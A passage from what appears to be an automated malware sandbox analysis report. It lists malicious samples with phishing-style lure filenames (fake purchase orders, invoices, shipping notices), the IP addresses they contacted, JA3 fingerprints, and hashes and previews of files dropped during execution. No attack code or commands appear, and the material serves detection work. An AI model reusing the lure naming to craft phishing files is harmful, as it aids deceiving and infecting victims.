                                                    kayo.exeGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    nicoleta.fagaras-DHL_TRACKING_1394942.htmlGet hashmaliciousBrowse
                                                    • 104.16.18.94
                                                    000OUTQ080519103.pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.164.131
                                                    PO7321.exeGet hashmaliciousBrowse
                                                    • 172.67.154.93
                                                    PRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
                                                    • 104.25.233.53
                                                    RFQ 100400806 SUPPLY.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    ikoAImKWvI.exeGet hashmaliciousBrowse
                                                    • 104.25.233.53
                                                    new_order20210408_14.docGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    BL01345678053567.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    invoice.xlsxGet hashmaliciousBrowse
                                                    • 104.25.233.53
                                                    new_order20210408_14.docGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    PR_A1191-04052021.xlsxGet hashmaliciousBrowse
                                                    • 104.25.233.53
                                                    DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                    • 104.21.61.102
                                                    DYNDNSUSPURCHASE ORDER - XIFFA55,pdf.exeGet hashmaliciousBrowse
                                                    • 131.186.113.70
                                                    PRICE_QUOTATION_RFQ_000988_PDF.exeGet hashmaliciousBrowse
                                                    • 131.186.113.70
                                                    RFQ 100400806 SUPPLY.exeGet hashmaliciousBrowse
                                                    • 162.88.193.70
                                                    SER09090899.exeGet hashmaliciousBrowse
                                                    • 162.88.193.70
                                                    PURCHASE ORDER-34002174,pdf.exeGet hashmaliciousBrowse
                                                    • 131.186.161.70
                                                    cricket.exeGet hashmaliciousBrowse
                                                    • 131.186.113.70
                                                    SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exeGet hashmaliciousBrowse
                                                    • 131.186.113.70
                                                    EMPRESA SUMPEX TRADE.exeGet hashmaliciousBrowse
                                                    • 216.146.43.70
                                                    Yeni siparis _WJO-001, pdf.exeGet hashmaliciousBrowse
                                                    • 131.186.113.70
                                                    Dringende RFQ_AP75887658_98788,pdf.exeGet hashmaliciousBrowse
                                                    • 216.146.43.70
                                                    MUYR09080.exeGet hashmaliciousBrowse
                                                    • 162.88.193.70
                                                    PURCHASE ORDER-34002174, pdf.exeGet hashmaliciousBrowse
                                                    • 162.88.193.70
                                                    Order CG-210331-1004.exeGet hashmaliciousBrowse
                                                    • 162.88.193.70
                                                    Yeni siparis _WJO-001, pdf.exeGet hashmaliciousBrowse
                                                    • 131.186.113.70
                                                    Invoice,PDF.exe.exeGet hashmaliciousBrowse
                                                    • 216.146.43.70
                                                    Payment Slip E05060_47.docGet hashmaliciousBrowse
                                                    • 131.186.113.70
                                                    PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                                    • 216.146.43.70
                                                    Confirmation_(#1422) DEKRA order,pdf.exeGet hashmaliciousBrowse
                                                    • 216.146.43.71
                                                    ATTACHED.exeGet hashmaliciousBrowse
                                                    • 216.146.43.71
                                                    Urgent RFQ_AP65425652_040621,pdf.exeGet hashmaliciousBrowse
                                                    • 131.186.113.70

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    54328bd36c14bd82ddaa0c04b25ed9adRFQ-034.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    ACdEbpiSYO.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    PURCHASE ORDER - XIFFA55,pdf.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    Invoice_ord00000009.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    kayo.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    RFQ 100400806 SUPPLY.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    new_order20210408_14.docGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    BL01345678053567.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    SER09090899.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    PURCHASE ORDER-34002174,pdf.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    cricket.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    DHLdocument11022020680908911.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    20200804-8293847pdf.scr.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    SKMC25832100083932157.jarGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    EMPRESA SUMPEX TRADE.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    Yeni siparis _WJO-001, pdf.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    Dringende RFQ_AP75887658_98788,pdf.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154
                                                    MUYR09080.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    • 172.67.188.154

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):4096
                                                    Entropy (8bit):0.5976804353698416
                                                    Encrypted:false
                                                    SSDEEP:6:bWlEk1GaD0JOCEfMuaaD0JOCEfMKQmDtAl/gz2cE0fMbhEZolrRSQ2hyYIIT:bWNGaD0JcaaD0JwQQtAg/0bjSQJ
                                                    MD5:0C2A0FB45AE1576A122F5656C2B87E6A
                                                    SHA1:A93AA5CEE6A26BF623A545FC0DF2B9696165BFFA
                                                    SHA-256:618F67B0C0755100E663919FFA287BCA588F800B638A2857067D393508FED4E3
                                                    SHA-512:AC1D71B8B6DF42B7B63F6CB516338D21EEA2A59B6C9743243AE029A366D1D06C6C4EF48AE9649F8572BC966E4775C771800C2CCFBF08BB87D7B5C9D43511BFD6
                                                    Malicious:false
                                                    Preview: ....E..h..(..........y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xdc05173d, page size 16384, DirtyShutdown, Windows version 10.0
                                                    Category:dropped
                                                    Size (bytes):32768
                                                    Entropy (8bit):0.09541840300770618
                                                    Encrypted:false
                                                    SSDEEP:6:RXzwl/+0XRIE11Y8TRXdyV6K7Xzwl/+0XRIE11Y8TRXdyV6K:50+0XO4bldzKL0+0XO4bldzK
                                                    MD5:AA689052BE348C1ECC66B5E639E3234B
                                                    SHA1:B9A6C6D0487A8165757361CDDC10811B65E8DE42
                                                    SHA-256:25E1EA5E8E0F2468C89C39700FDAD0F8C204447B5B18D9B51D14049B4C22231F
                                                    SHA-512:48BA3314A159441D4058A3BDEC38D70A0178A036D04127A4726A2A04AF7099DCC77CD79349BE0188E0EF7C20D287F27AD67B9C52C46F5D68958D2E1073D72B16
                                                    Malicious:false
                                                    Preview: ...=... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w........................................................................................................................................................................................................................................{.....y.e................!........y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):8192
                                                    Entropy (8bit):0.1108664572894607
                                                    Encrypted:false
                                                    SSDEEP:3:JllTEvg3QUAl/bJdAtiVhVloll:xag3XAt4g2
                                                    MD5:52FA11AC12F2144CC9C1D312B9B48211
                                                    SHA1:3E9586A500E74302E80B17EE0F43721BC57440C9
                                                    SHA-256:CCC3477C544B4A63479742AE688F25935EB4661AB7E56E16781EC03482F66AA2
                                                    SHA-512:1A31B93FE26B4ECA6E389C1B1114B2732ACC27B3E18506A7C03EAF7CAA75F4FAC0048D113BAA092B305080424D7DB89552228B4D069E9BA8C74EA7C598566A01
                                                    Malicious:false
                                                    Preview: .Lt......................................3...w.......y.......w...............w.......w....:O.....w..................!........y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_lfQuSBwdSf.exe_dbcf35fab953bf6b1a979b91e3aa6f6e971ce7_957fde8e_1840eb32\Report.wer
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):17404
                                                    Entropy (8bit):3.7598066063700224
                                                    Encrypted:false
                                                    SSDEEP:192:hZGB8e4mHBUZMXSaKQqueZitu/u7sQS274Itbx:O2eZBUZMXSaFmJ/u7sQX4Itbx
                                                    MD5:79641D2E96E5F7DC6F51501B97E9CAAB
                                                    SHA1:94CB1967BA3F74A848D81E33BC9A4EC849CD39A8
                                                    SHA-256:CC51A3F9523D499F82ECEE27807107A7C707AF1E08C7FAC8C134760B130AEAE1
                                                    SHA-512:CA78672F7C42C83E8CC208CBF7579689D26700C9B27C8D5B249DF1E2D408B471AF39B9DA9A62D555AF7B37432A681A335ED8DA6242D24435E27DD8D0B0A4FB7C
                                                    Malicious:true
                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.2.3.7.8.5.4.6.7.1.3.2.2.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.2.3.7.8.5.5.5.1.0.3.8.2.6.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.1.c.b.d.3.0.-.7.e.c.3.-.4.b.f.5.-.b.b.c.4.-.f.8.e.d.a.b.c.f.9.c.f.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.d.f.c.b.0.3.-.b.3.a.c.-.4.0.7.e.-.8.4.b.8.-.6.4.7.e.6.3.1.c.0.e.f.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.f.Q.u.S.B.w.d.S.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.D.i.m.b.o.n.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.e.4.-.0.0.0.1.-.0.0.1.7.-.f.c.f.c.-.4.5.3.b.a.1.2.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.4.9.0.5.2.9.4.d.a.f.2.3.9.d.d.6.1.4.2.d.1.0.9.e.1.c.d.0.1.f.b.0.0.0.0.0.0.0.0.!.0.0.0.0.f.8.e.d.b.b.e.d.8.3.1.8.3.1.1.f.0.7.0.1.6.7.c.7.3.f.c.c.a.9.f.6.3.f.
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE46.tmp.dmp
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, Thu Apr 8 18:02:30 2021, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):330441
                                                    Entropy (8bit):3.629346303572354
                                                    Encrypted:false
                                                    SSDEEP:3072:DNa2o3eyzFdhx0nAyjd+pOD0QRUCgUeAw/9gIOgF59jVjZpXe:dQP0epW7Tj1k9RpD95jZle
                                                    MD5:F80E8E853AC993B123EF2D189BC5D4A6
                                                    SHA1:8C57934C587DBFBAA1236F1BF655CEB989EAB236
                                                    SHA-256:5133BE65AFA86EB1B4F7906A86C113E06ECD13F42A839616DB99F290A5D6EB0C
                                                    SHA-512:DA3BBCC9061439054BD4599DA2F56CADA8EA063B7296AC55D6158BCAB21BA18A5EF9A4C7CA9FC93168CCBBBE248C9039A9005A654F7D9752E5F43498A6835E29
                                                    Malicious:false
                                                    Preview: MDMP....... .......6Eo`...................U...........B......l1......GenuineIntelW...........T............Eo`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERD903.tmp.WERInternalMetadata.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8408
                                                    Entropy (8bit):3.69539172946485
                                                    Encrypted:false
                                                    SSDEEP:192:Rrl7r3GLNiNB6K6YSKSUi6I3WegmfZOSUCprY89bTnEsf0zxm:RrlsNir6K6YPSUi6OWegmfcSpTn3fB
                                                    MD5:0E16BAA073DA35DADE06031DE91DBB5E
                                                    SHA1:27E52AD81E964E9EB4ECACE5528058776D7B9AF2
                                                    SHA-256:D1F5C3BF879527D91027766168562B2E854AA6BF429B321A127A44916B30655C
                                                    SHA-512:1205B8CA1F29160F6ED376E0CC13AED8037A91351E3846456074C45D758F640860CD7F36D76893501D23B34F3E2E1CA26FA941A5EA19CD9B72DF4BE139D6F512
                                                    Malicious:false
                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.7.8.8.<./.P.i.d.>.......
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERDB94.tmp.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4750
                                                    Entropy (8bit):4.474044588371349
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwSD8zsJJgtWI9+Ay6WSC8BL8fm8M4J4FF037+q8vvrJEnJbCrcdd:uITfbYSSNeJz7KzJEnJGrcdd
                                                    MD5:3E5B568551BEFAFC35E627281F8CDE65
                                                    SHA1:CB3622DD78CB6F7F6C7CEA47F0DA87474D49E4B5
                                                    SHA-256:C08106AF77EA9D1D5FB81C525BB443F9FA1C442D76381FAB26966B28217C57AD
                                                    SHA-512:708FABFA888069A6F584666011EF9E2131A67FE902B53B2F42D92839BFD41842023434B26DA5EAD019C65B3818A94D82B8748BD4389F18E08BB363B04A3B067B
                                                    Malicious:false
                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="937633" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):698
                                                    Entropy (8bit):5.049094101509586
                                                    Encrypted:false
                                                    SSDEEP:12:reVGyMYx2Y5BYtmWNUc5AtYX5E4a2KryMYGH+ptsxptsOtw9O9S8:reUyMGF5ytmLcetYX5E2KryMb+zsxzsk
                                                    MD5:B0CEEA53B3467F59FD8E87F80213BDE9
                                                    SHA1:D9E6D1CBB480E7248658DF935648DFA733745602
                                                    SHA-256:D9C93CB64E6F1F5BDC94581CEEA99F759EE1E35716EAF623C61962EA0152F9DD
                                                    SHA-512:DDAA6C9FA3535B4926C60B692F8E202D10EB160D1F8BE7A9DE79239EF75AFD470403DF1D8F0CBF29A5F819E907D02E8E656BB9A52E71E30D9259987EAE881655
                                                    Malicious:false
                                                    Preview: PSMODULECACHE......w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package........Find-Package........Install-PackageProvider........Import-PackageProvider........Get-PackageProvider........Register-PackageSource........Uninstall-Package........Find-PackageProvider........D..8.......C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1........Get-OperationValidation........Invoke-OperationValidation........
                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.11021535299334234
                                                    Encrypted:false
                                                    SSDEEP:12:26fEzXm/Ey6q9995cwuNq3qQ10nMCldimE8eawHjcIEv:26fBl689ugLyMCldzE9BHjcIE
                                                    MD5:D8F8828F046E214C4F83197D79308E4E
                                                    SHA1:0CE8ABF0F299AFA77651703664850B30F7205FF9
                                                    SHA-256:298F7C2C58A35D3F9018C168A05CAB802CB908A32B5FE47325F050AD8222121C
                                                    SHA-512:C263EE316960DC044520C7475A035D9E6F5BCE3064C025834AE468270C40C0A9CAB80905FA9A2C961AF55B5DAB1A47BB73A4F0EA6DEAF086DEA6D46C96908D65
                                                    Malicious:false
                                                    Preview: ................................................................................(.........N......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................M......... ......Y9Q.,..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.(........W.....................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.11234695267431766
                                                    Encrypted:false
                                                    SSDEEP:12:BzXm/Ey6q9995cktL1miM3qQ10nMCldimE8eawHza1miIuf:Ml68X1tMLyMCldzE9BHza1tIO
                                                    MD5:25C45E2E80B645291BE51ED449ADF375
                                                    SHA1:54C9935A5125550F947D32BF83AE7A5EFA57E0B8
                                                    SHA-256:C5BFCFB1A1C6F430C88F820EBCD0B5DFEB66E1D504357C40BE1F11CCBA00ED0E
                                                    SHA-512:E6CDC84A6D4AEFF20DD6E35D7EC45B3AA84E8BF310DD6B59F4F1FBD08A85AB71B355E2AD8AC6FF92AA7F041E2D2A7C4894B18A07ACCFE179D82D6DFA4DDF49C9
                                                    Malicious:false
                                                    Preview: ................................................................................(.........F......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................M......... .....x3.Q.,..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.(.........H.....................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.11247201638927183
                                                    Encrypted:false
                                                    SSDEEP:12:kzXm/Ey6q9995c7x1mK2P3qQ10nMCldimE8eawHza1mKmf:hl68k1iPLyMCldzE9BHza1a
                                                    MD5:B4833118DA36CBF8E6082C02364BBB4F
                                                    SHA1:D5F49A356B1A273FA41B354F22F1642C726DA33C
                                                    SHA-256:40F0F8C311F41D76B4599B105405CF2F7FA54A0D767DB3E5A43B0EEC2DDF66EC
                                                    SHA-512:521010B548704EEDB1360549075BD5FBC7F2D7D725A1C632375BBB46FB731D25753242BF981EF48AC5BE32B93CDABD63AC2B4B1ADBBB655AB06952FF67B87366
                                                    Malicious:false
                                                    Preview: ................................................................................(.......s.+......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................M......... ......t.P.,..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.(.........-.....................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3unvo0at.i2z.psm1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afdwa5sz.ycm.ps1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bk34zenz.mnc.psm1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cv5sw5e3.x0i.psm1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkeuwky5.kyp.ps1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wacrv0pl.app.ps1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
